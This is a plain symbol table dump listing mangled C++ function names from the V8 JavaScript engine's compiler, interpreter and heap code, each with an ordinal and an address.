                                  ?Float64Equal@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57290x140e12600
                                  ?Float64Equal@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57300x140e6ce90
                                  ?Float64Exp@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z57310x140e6cef0
                                  ?Float64Exp@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57320x140e126c0
                                  ?Float64Exp@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z57330x140e6cf50
                                  ?Float64Expm1@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z57340x140e6cf90
                                  ?Float64Expm1@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57350x140e12780
                                  ?Float64Expm1@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z57360x140e6cff0
                                  ?Float64ExtractHighWord32@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUint32T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z57370x140e6d030
                                  ?Float64ExtractHighWord32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z57380x140ec4ad0
                                  ?Float64ExtractHighWord32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57390x140e12840
                                  ?Float64ExtractHighWord32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z57400x140e6d090
                                  ?Float64ExtractLowWord32@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUint32T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z57410x140e6d0d0
                                  ?Float64ExtractLowWord32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z57420x140ec4b80
                                  ?Float64ExtractLowWord32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57430x140e12900
                                  ?Float64ExtractLowWord32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z57440x140e6d130
                                  ?Float64GreaterThan@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@0@Z57450x140e6d170
                                  ?Float64GreaterThan@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57460x140e6d1e0
                                  ?Float64GreaterThanOrEqual@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@0@Z57470x140e6d240
                                  ?Float64GreaterThanOrEqual@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57480x140e6d2b0
                                  ?Float64InsertHighWord32@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UWord32T@internal@v8@@@34@@Z57490x140e6d310
                                  ?Float64InsertHighWord32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57500x140ec4c30
                                  ?Float64InsertHighWord32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57510x140e129c0
                                  ?Float64InsertHighWord32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57520x140e6d380
                                  ?Float64InsertLowWord32@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UWord32T@internal@v8@@@34@@Z57530x140e6d3e0
                                  ?Float64InsertLowWord32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57540x140ec4ce0
                                  ?Float64InsertLowWord32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57550x140e12a80
                                  ?Float64InsertLowWord32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57560x140e6d450
                                  ?Float64LessThan@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@0@Z57570x140e6d4b0
                                  ?Float64LessThan@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57580x140ec4d90
                                  ?Float64LessThan@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57590x140e12b40
                                  ?Float64LessThan@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57600x140e6d520
                                  ?Float64LessThanOrEqual@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@0@Z57610x140e6d580
                                  ?Float64LessThanOrEqual@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57620x140ec4e40
                                  ?Float64LessThanOrEqual@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57630x140e12c00
                                  ?Float64LessThanOrEqual@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57640x140e6d5f0
                                  ?Float64Log10@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z57650x140e6d650
                                  ?Float64Log10@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57660x140e12cc0
                                  ?Float64Log10@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z57670x140e6d6b0
                                  ?Float64Log1p@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z57680x140e6d6f0
                                  ?Float64Log1p@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57690x140e12d80
                                  ?Float64Log1p@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z57700x140e6d750
                                  ?Float64Log2@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z57710x140e6d790
                                  ?Float64Log2@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57720x140e12e40
                                  ?Float64Log2@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z57730x140e6d7f0
                                  ?Float64Log@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z57740x140e6d830
                                  ?Float64Log@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57750x140e12f00
                                  ?Float64Log@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z57760x140e6d890
                                  ?Float64Max@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@0@Z57770x140e6d8d0
                                  ?Float64Max@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57780x140e12fc0
                                  ?Float64Max@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57790x140e6d940
                                  ?Float64Min@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@0@Z57800x140e6d9a0
                                  ?Float64Min@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57810x140e13080
                                  ?Float64Min@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57820x140e6da10
                                  ?Float64Mod@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@0@Z57830x140e6da70
                                  ?Float64Mod@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57840x140ec4ef0
                                  ?Float64Mod@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57850x140e13140
                                  ?Float64Mod@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57860x140e6dae0
                                  ?Float64Mul@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@0@Z57870x140e6db40
                                  ?Float64Mul@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57880x140e13200
                                  ?Float64Mul@MachineOperatorReducer@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0@Z57890x140fa9e40
                                  ?Float64Mul@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57900x140e6dbb0
                                  ?Float64Neg@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z57910x140e6dc10
                                  ?Float64Neg@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57920x140e132c0
                                  ?Float64Neg@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z57930x140e6dc70
                                  ?Float64NotEqual@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@0@Z57940x140e6dcb0
                                  ?Float64NotEqual@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57950x140e6dd30
                                  ?Float64OperatorFor@RepresentationChanger@compiler@internal@v8@@QEAAPEBVOperator@234@W4Value@IrOpcode@234@@Z57960x140ffdf30
                                  ?Float64Pow@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@0@Z57970x140e6dd90
                                  ?Float64Pow@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57980x140e13380
                                  ?Float64Pow@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z57990x140e6de00
                                  ?Float64PowHalf@MachineOperatorReducer@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z58000x140fa9ea0
                                  ?Float64Round@SimplifiedLowering@compiler@internal@v8@@AEAAPEAVNode@234@QEAV5234@@Z58010x140fd5fb0
                                  ?Float64RoundDown@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z58020x140e6de60
                                  ?Float64RoundDown@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z58030x140ec4fa0
                                  ?Float64RoundDown@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ58040x140e13440
                                  ?Float64RoundDown@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z58050x140e6dec0
                                  ?Float64RoundTiesAway@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ58060x140e13520
                                  ?Float64RoundTiesAway@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z58070x140e6df10
                                  ?Float64RoundTiesEven@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z58080x140e6df60
                                  ?Float64RoundTiesEven@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ58090x140e13600
                                  ?Float64RoundTiesEven@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z58100x140e6dfc0
                                  ?Float64RoundTruncate@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z58110x140e6e010
                                  ?Float64RoundTruncate@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z58120x140ec5070
                                  ?Float64RoundTruncate@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ58130x140e136e0
                                  ?Float64RoundTruncate@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z58140x140e6e070
                                  ?Float64RoundUp@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z58150x140e6e0c0
                                  ?Float64RoundUp@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ58160x140e137c0
                                  ?Float64RoundUp@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z58170x140e6e120
                                  ?Float64Sign@SimplifiedLowering@compiler@internal@v8@@AEAAPEAVNode@234@QEAV5234@@Z58180x140fd61e0
                                  ?Float64SilenceNaN@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z58190x140e6e170
                                  ?Float64SilenceNaN@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z58200x140ec5140
                                  ?Float64SilenceNaN@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58210x140e138a0
                                  ?Float64SilenceNaN@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z58220x140e6e1d0
                                  ?Float64Sin@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z58230x140e6e210
                                  ?Float64Sin@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58240x140e13960
                                  ?Float64Sin@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z58250x140e6e270
                                  ?Float64Sinh@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z58260x140e6e2b0
                                  ?Float64Sinh@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58270x140e13a20
                                  ?Float64Sinh@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z58280x140e6e310
                                  ?Float64Sqrt@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z58290x140e6e350
                                  ?Float64Sqrt@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58300x140e13ae0
                                  ?Float64Sqrt@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z58310x140e6e3b0
                                  ?Float64Sub@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@0@Z58320x140e6e3f0
                                  ?Float64Sub@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z58330x140ec51f0
                                  ?Float64Sub@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58340x140e13ba0
                                  ?Float64Sub@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z58350x140e6e460
                                  ?Float64Tan@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z58360x140e6e4c0
                                  ?Float64Tan@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58370x140e13c60
                                  ?Float64Tan@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z58380x140e6e520
                                  ?Float64Tanh@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z58390x140e6e560
                                  ?Float64Tanh@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58400x140e13d20
                                  ?Float64Tanh@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z58410x140e6e5c0
                                  ?Float@AsmType@wasm@internal@v8@@SAPEAV1234@XZ58420x140a63250
                                  ?FloatQ@AsmType@wasm@internal@v8@@SAPEAV1234@XZ58430x140a63260
                                  ?FloatQDoubleQ@AsmType@wasm@internal@v8@@SAPEAV1234@XZ58440x14098e530
                                  ?Floatish@AsmType@wasm@internal@v8@@SAPEAV1234@XZ58450x140a63270
                                  ?FloatishDoubleQ@AsmType@wasm@internal@v8@@SAPEAV1234@XZ58460x14098e5b0
                                  ?FloodWithOneShot@Debug@internal@v8@@AEAAXV?$Handle@VSharedFunctionInfo@internal@v8@@@23@_N@Z58470x1409bfff0
                                  ?Flush@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAAXXZ58480x140870f30
                                  ?Flush@OptimizingCompileDispatcher@internal@v8@@QEAAXW4BlockingBehavior@23@@Z58490x1409d4780
                                  ?FlushICache@CpuFeatures@internal@v8@@CAXPEAX_K@Z58500x1400768e0
                                  ?FlushInstructionCache@internal@v8@@YAXPEAX_K@Z58510x1409e9350
                                  ?FlushInstructionCache@internal@v8@@YAX_K0@Z58520x1404361b0
                                  ?FlushMemoryChunkData@ConcurrentMarking@internal@v8@@QEAAXPEAVMajorNonAtomicMarkingState@23@@Z58530x14095c5d0
                                  ?FlushNativeContexts@ConcurrentMarking@internal@v8@@QEAAXPEAVNativeContextStats@23@@Z58540x14095c740
                                  ?FlushOutputQueue@OptimizingCompileDispatcher@internal@v8@@AEAAX_N@Z58550x1409d48a0
                                  ?FlushToGlobal@MarkingWorklists@internal@v8@@QEAAXXZ58560x1408efc30
                                  ?FlushWrapperCacheIfFull@ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@AEAAXXZ58570x14095a1b0
                                  ?FoldConstant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58580x140e0a7d0
                                  ?For@ConsumedPreparseData@internal@v8@@SA?AV?$unique_ptr@VConsumedPreparseData@internal@v8@@U?$default_delete@VConsumedPreparseData@internal@v8@@@std@@@std@@PEAVIsolate@23@V?$Handle@VPreparseData@internal@v8@@@23@@Z58590x1407252c0
                                  ?For@ScannerStream@internal@v8@@SAPEAVUtf16CharacterStream@23@PEAVExternalSourceStream@ScriptCompiler@3@W4Encoding@StreamedSource@63@@Z58600x1406f68d0
                                  ?For@ScannerStream@internal@v8@@SAPEAVUtf16CharacterStream@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@@Z58610x1406f6a50
                                  ?For@ScannerStream@internal@v8@@SAPEAVUtf16CharacterStream@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@HH@Z58620x1406f6a60
                                  ?For@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@@Z58630x140a85070
                                  ?For@Type@compiler@internal@v8@@SA?AV1234@AEBVMapRef@234@@Z58640x14045a450
                                  ?ForApi@Private@v8@@SA?AV?$Local@VPrivate@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@@Z58650x140a850b0
                                  ?ForApi@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@@Z58660x140a850f0
                                  ?ForArgumentsCallee@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58670x140edf2c0
                                  ?ForArgumentsLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58680x140edf310
                                  ?ForBigIntBitfield@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58690x140edf360
                                  ?ForBigIntLeastSignificantDigit64@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58700x140edf3c0
                                  ?ForBigIntOptionalPadding@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58710x140edf420
                                  ?ForBuiltin@NewFunctionArgs@internal@v8@@SA?AV123@V?$Handle@VString@internal@v8@@@23@V?$Handle@VMap@internal@v8@@@23@H@Z58720x140946210
                                  ?ForCellValue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58730x140edf480
                                  ?ForConsStringFirst@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58740x140edf4c0
                                  ?ForConsStringSecond@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58750x140edf510
                                  ?ForContextSlot@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@_K@Z58760x140edf560
                                  ?ForContextSlotKnownPointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@_K@Z58770x140edf5b0
                                  ?ForDescriptorArrayEnumCache@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58780x140edf600
                                  ?ForDictionaryNextEnumerationIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58790x140edf650
                                  ?ForDictionaryObjectHashIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58800x140edf6b0
                                  ?ForEnumCacheIndices@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58810x140edf600
                                  ?ForEnumCacheKeys@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58820x140edf710
                                  ?ForExternalIntPtr@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58830x140edf760
                                  ?ForExternalStringResourceData@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58840x140edf7a0
                                  ?ForFixedArrayElement@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@W4ElementsKind@34@W4LoadSensitivity@34@@Z58850x140edf7f0
                                  ?ForFixedArrayElement@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ58860x140edf8e0
                                  ?ForFixedArrayLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58870x140edf920
                                  ?ForFixedArraySlot@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@_KW4WriteBarrierKind@234@@Z58880x140edf980
                                  ?ForFixedDoubleArrayElement@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ58890x140edf9d0
                                  ?ForFunctionCompile@UnoptimizedCompileFlags@internal@v8@@SA?AV123@PEAVIsolate@23@VSharedFunctionInfo@23@@Z58900x140739c70
                                  ?ForHashTableBaseCapacity@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58910x140edfa20
                                  ?ForHashTableBaseNumberOfDeletedElement@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58920x140edfa80
                                  ?ForHashTableBaseNumberOfElements@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58930x140edfae0
                                  ?ForHeapNumberValue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ58940x140edfb40
                                  ?ForInContinue@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@0@Z58950x140893ec0
                                  ?ForInEnumerate@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@@Z58960x140893ee0
                                  ?ForInEnumerate@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58970x140eadc10
                                  ?ForInNext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@0VRegisterList@234@H@Z58980x140894060
                                  ?ForInNext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4ForInMode@234@@Z58990x140eadc20
                                  ?ForInPrepare@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegisterList@234@H@Z59000x140894120
                                  ?ForInPrepare@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4ForInMode@234@@Z59010x140eadce0
                                  ?ForInStep@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@@Z59020x1408942f0
                                  ?ForJSArrayBufferBitField@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59030x140edfba0
                                  ?ForJSArrayBufferViewBuffer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59040x140edfc00
                                  ?ForJSArrayBufferViewByteLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59050x140edfc50
                                  ?ForJSArrayBufferViewByteOffset@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59060x140edfcb0
                                  ?ForJSArrayIteratorIteratedObject@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59070x140edfd10
                                  ?ForJSArrayIteratorKind@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59080x140edfd60
                                  ?ForJSArrayIteratorNextIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59090x140edfdc0
                                  ?ForJSArrayLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@W4ElementsKind@34@@Z59100x140edfe20
                                  ?ForJSAsyncFunctionObjectPromise@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59110x140edfec0
                                  ?ForJSAsyncGeneratorObjectIsAwaiting@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59120x140edff10
                                  ?ForJSAsyncGeneratorObjectQueue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59130x140edff70
                                  ?ForJSBoundFunctionBoundArguments@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59140x140edffc0
                                  ?ForJSBoundFunctionBoundTargetFunction@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59150x140ee0010
                                  ?ForJSBoundFunctionBoundThis@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59160x140edf2c0
                                  ?ForJSCollectionIteratorIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59170x140ee0060
                                  ?ForJSCollectionIteratorTable@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59180x140edfc00
                                  ?ForJSCollectionTable@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59190x140edfc00
                                  ?ForJSDataViewDataPointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59200x140ee00c0
                                  ?ForJSDateField@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@W4FieldIndex@JSDate@34@@Z59210x140ee0110
                                  ?ForJSDateValue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59220x140ee0160
                                  ?ForJSFunctionCode@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59230x140ee01c0
                                  ?ForJSFunctionContext@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59240x140ee0210
                                  ?ForJSFunctionFeedbackCell@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59250x140edffc0
                                  ?ForJSFunctionPrototypeOrInitialMap@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59260x140ee0260
                                  ?ForJSFunctionSharedFunctionInfo@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59270x140edfc00
                                  ?ForJSGeneratorObjectContext@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59280x140ee0210
                                  ?ForJSGeneratorObjectContinuation@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59290x140ee02b0
                                  ?ForJSGeneratorObjectFunction@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59300x140ee0310
                                  ?ForJSGeneratorObjectInputOrDebugPos@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59310x140ee0360
                                  ?ForJSGeneratorObjectParametersAndRegisters@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59320x140ee03b0
                                  ?ForJSGeneratorObjectReceiver@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59330x140edffc0
                                  ?ForJSGeneratorObjectResumeMode@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59340x140ee0400
                                  ?ForJSGlobalProxyNativeContext@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59350x140ee0460
